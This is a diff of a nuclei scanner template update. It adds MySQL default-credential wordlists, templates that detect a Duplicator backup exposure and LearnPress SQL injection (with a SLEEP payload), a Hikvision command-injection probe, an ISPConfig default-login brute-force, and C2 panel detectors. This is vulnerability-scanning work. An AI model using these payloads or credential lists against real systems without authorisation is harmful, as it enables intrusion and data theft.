Merge pull request #9309 from projectdiscovery/feature-branch-2024030…

…9142342

New Templates Update

helpers/wordlists/mysql-passwords.txt

@@ -0,0 +1,19 @@
+mysql
+root
+chippc
+admin
+nagiosxi
+usbw
+cloudera
+moves
+testpw
+p@ck3tf3nc3
+medocheck123
+mktt
+123
+amp109
+eLaStIx.asteriskuser.2oo7
+raspberry
+openauditrootuserpassword
+vagrant
+123qweASD#

helpers/wordlists/mysql-users.txt

@@ -0,0 +1,7 @@
+root
+admin
+cloudera
+moves
+mcUser
+dbuser
+asteriskuser

http/cves/2023/CVE-2023-6114.yaml

@@ -0,0 +1,37 @@
+id: CVE-2023-6114
+
+info:
+  name: Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure
+  author: DhiyaneshDk
+  severity: high
+  description: |
+    The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.
+  remediation: Duplicator Fixed in 1.5.7.1,Duplicator-Pro Fixed in 4.5.14.2.
+  reference:
+    - https://drive.google.com/file/d/1mpapFCqfZLv__EAM7uivrrl2h55rpi1V/view?usp=sharing
+    - https://wpscan.com/vulnerability/5c5d41b9-1463-4a9b-862f-e9ee600ef8e1
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-6114
+    - https://wpscan.com/plugin/duplicator/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2023-6114
+    cwe-id: CWE-552
+    epss-score: 0.00145
+    epss-percentile: 0.50326
+    cpe: cpe:2.3:a:awesomemotive:duplicator:*:*:*:*:-:wordpress:*:*
+  tags: cve,cve2023,duplicator,duplicator-pro,lfi,wpscan,wordpress,wp-plugin,wp
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-content/backups-dup-lite/tmp/"
+      - "{{BaseURL}}/wp-content/backups-dup-pro/tmp/"
+
+    stop-at-first-match: true
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code == 200"
+          - "contains(body, '/tmp') && contains(body, '<title>Index of')"
+        condition: and

http/cves/2023/CVE-2023-6567.yaml

@@ -0,0 +1,33 @@
+id: CVE-2023-6567
+
+info:
+  name: LearnPress <= 4.2.5.7 - SQL Injection
+  author: iamnoooob,rootxharsh,pdresearch
+  severity: critical
+  description: |
+    The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
+  remediation: Fixed in version 4.2.5.8
+  reference:
+    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress/learnpress-4257-unauthenticated-sql-injection-via-order-by
+    - https://wpscan.com/vulnerability/c5110450-3b4e-4100-8db4-0d7f5d43c12f/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-6567
+  classification:
+    cve-id: CVE-2023-6567
+  metadata:
+    max-request: 1
+    verified: true
+    publicwww-query: "/wp-content/plugins/learnpress"
+  tags: cve,cve2023,wp,wp-plugin,wordpress,learnpress,sqli
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wp-json/lp/v1/courses/archive-course?&order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'contains_all(header, "lp_session_guest=", "application/json")'
+          - 'contains_all(body, "status\":\"success", "No courses were found")'
+        condition: and

http/cves/2023/CVE-2023-6895.yaml

@@ -1,56 +1,57 @@
 id: CVE-2023-6895
 
 info:
-  name: Hikvision Intercom Broadcasting System - Command Execution
-  author: archer
+  name: Hikvision IP ping.php - Command Execution
+  author: DhiyaneshDk,archer
   severity: critical
   description: |
-    Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.
+    A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.
   reference:
-    - https://github.com/FuBoLuSec/CVE-2023-6895/blob/main/CVE-2023-6895.py
     - https://vuldb.com/?ctiid.248254
     - https://vuldb.com/?id.248254
-    - https://github.com/Marco-zcl/POC
-    - https://github.com/d4n-sec/d4n-sec.github.io
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2023-6895
     cwe-id: CWE-78
     epss-score: 0.0008
-    epss-percentile: 0.32716
+    epss-percentile: 0.33389
     cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:*
   metadata:
     verified: true
     max-request: 1
     vendor: hikvision
     product: intercom_broadcast_system
     fofa-query: icon_hash="-1830859634"
-  tags: cve,cve2023,rce,hikvision
+  tags: cve,cve2023,hikvision,rce
 
 http:
-  - raw:
-      - |
-        POST /php/ping.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-        X-Requested-With: XMLHttpRequest
+  - method: POST
+    path:
+      - "{{BaseURL}}/php/ping.php"
+    body: "jsondata%5Btype%5D=99&jsondata%5Bip%5D={{command}}"
+    headers:
+      Content-Type: "application/x-www-form-urlencoded"
 
-        jsondata%5Btype%5D=99&jsondata%5Bip%5D=ping%20{{interactsh-url}}
+    payloads:
+      command:
+        - 'id'
+        - 'cmd /c ipconfig'
 
     matchers-condition: and
     matchers:
-      - type: word
-        part: interactsh_protocol
-        words:
-          - "dns"
+      - type: regex
+        part: body
+        regex:
+          - "Windows IP"
+          - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
+        condition: or
 
       - type: word
-        part: body
+        part: header
         words:
-          - "TTL="
+          - "text/html"
 
       - type: status
         status:
           - 200
-# digest: 490a00463044022046e9673fbb222a36f6113e7f32e176bc2d800d2a0f8fb0824bc84dd30705c4fa022051992f8ba2020e9c09b574c69ecbca8b48a5d98fda9f790dd46ba0313ebb08bb:922c64590222798bb761d5b6d8e72950

http/default-logins/ispconfig-default-login.yaml

@@ -0,0 +1,61 @@
+id: ispconfig-default-login
+
+info:
+  name: ISPConfig - Default Password
+  author: pussycat0x
+  severity: high
+  description: |
+    ISPConfig Default Password Vulnerability exposes systems to unauthorized access, compromising data integrity and security.
+  metadata:
+    verified: true
+    shodan-query: http.title:"ispconfig"
+  tags: default-login,ispconfig
+
+http:
+  - raw:
+      - |
+        GET /lgoin HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /login/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Origin: {{BaseURL}}
+        Connection: close
+        Referer: {{RootURL}}/login/
+
+        username={{username}}&password={{password}}&s_mod=login&s_pg=index
+
+      - |
+        GET /sites/web_vhost_domain_list.php HTTP/1.1
+        Host: {{Hostname}}
+        X-Requested-With: XMLHttpRequest
+        Referer: {{RootURL}}/index.php
+
+    attack: pitchfork
+    payloads:
+      username:
+        - 'admin'
+        - 'guest'
+        - 'root'
+      password:
+        - 'admin'
+        - 'password'
+        - 'toor'
+
+    stop-at-first-match: true
+    host-redirects: true
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body_3
+        words:
+          - Tools
+          - Websites
+        condition: and
+
+      - type: status
+        status:
+          - 200

http/exposed-panels/c2/ares-rat-c2.yaml

@@ -0,0 +1,33 @@
+id: ares-rat-c2
+
+info:
+  name: Area Rat C2 - Detect
+  author: pussycat0x
+  severity: info
+  description: |
+    Ares is a Python Remote Access Tool.
+  reference:
+    - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: product:'Ares RAT C2'
+  tags: c2,ir,osint,ares,panel,rat
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}/login'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Ares</title>'
+          - 'Passphrase:'
+        condition: and
+
+      - type: status
+        status:
+          - 200

http/exposed-panels/c2/caldera-c2.yaml

@@ -0,0 +1,32 @@
+id: caldera-c2
+
+info:
+  name: Caldera C2 - Detect
+  author: pussycat0x
+  severity: info
+  description: |
+    MITRE Caldera™ is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response.
+  reference:
+    - https://github.com/mitre/caldera
+    - https://github.com/montysecurity/C2-Tracker/blob/main/tracker.py
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: http.favicon.hash:-636718605
+  tags: c2,ir,osint,caldera,panel
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Login | CALDERA</title>'
+
+      - type: status
+        status:
+          - 200

http/exposed-panels/c2/hack5-cloud-c2.yaml

@@ -0,0 +1,31 @@
+id: hack5-cloud-c2
+
+info:
+  name: Hack5 Cloud C2 - Detect
+  author: pussycat0x
+  severity: info
+  description: |
+    Cloud C² is a self-hosted web-based command and control suite for networked Hak5 gear that lets you pentest from anywhere. Linux, Mac and Windows computers can host the Cloud C² server while Hak5 gear such as the WiFi Pineapple, LAN Turtle and Packet Squirrel can be provisioned as clients.
+  reference:
+    - https://twitter.com/fofabot/status/1742737671037091854
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: app="Hak5-C2"
+  tags: c2,ir,osint,hack5c2,panel
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<title>Hak5 Cloud C²</title>'
+
+      - type: status
+        status:
+          - 200

http/exposed-panels/c2/pupyc2.yaml

@@ -0,0 +1,32 @@
+id: pupyc2
+
+info:
+  name: PupyC2 - Detect
+  author: pussycat0x
+  severity: info
+  description: |
+    Pupy is a cross-platform, multi function RAT and post-exploitation tool mainly written in python. It features an all-in-memory execution guideline and leaves a very low footprint. Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.
+  reference:
+    - https://twitter.com/TLP_R3D/status/1654038602282565632
+    - https://github.com/n1nj4sec/pupy
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: aa3939fc357723135870d5036b12a67097b03309
+  tags: c2,ir,osint,pupyc2,panel
+
+http:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'Etag: "aa3939fc357723135870d5036b12a67097b03309"'
+
+      - type: status
+        status:
+          - 200